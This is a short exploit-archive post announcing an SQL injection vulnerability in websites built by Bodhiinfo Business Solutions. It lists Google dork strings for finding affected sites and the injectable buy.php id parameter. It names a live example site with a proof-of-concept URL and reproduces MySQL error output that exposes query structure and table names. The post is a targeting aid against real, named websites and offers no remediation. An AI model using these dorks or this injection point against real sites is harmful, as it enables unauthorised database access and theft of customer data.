facebook facebook twitter rss

Powered By Bodhiinfo Business Solutions Kerala India SQL

Author: KingSkrupellos , Published: 08-10-2018
################################################################################################

# Exploit Title : Powered By Bodhiinfo Business Solutions Kerala India SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/10/2018
# Vendor Homepage : bodhiinfo.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dork :

intext:''Powered By Bodhii''

intext:''Powered By Bodhiinfo''

intext:''Copyright © 2018 Bodhi. All Rights Reserved''

# SQL Injection Exploit :

/buy.php?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Site => flavormart.in/buy.php?id=42%27 => [ Proof of Concept ] => archive.is/QJmID

# SQL Database Error =>

MySQL Query fail: SELECT product_purchase.ID, product_creation.productName, product_creation.description,
product_creation.features, product_purchase.originalRate, product_purchase.flavormartRate FROM product_purchase,
product_creation WHERE product_purchase.ID='42'' AND product_purchase.productCreateId =
product_creation.ID ORDER BY product_purchase.ID DESC

You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near ''42'' AND product_purchase.productCreateId
= product_creation.ID ' at line 8

MySQL Query fail: SELECT purchase_type.purchaseId ID, purchase_type.typeId FROM
purchase_type WHERE purchase_type.purchaseId='42''

You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near ''42''' at line 4

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :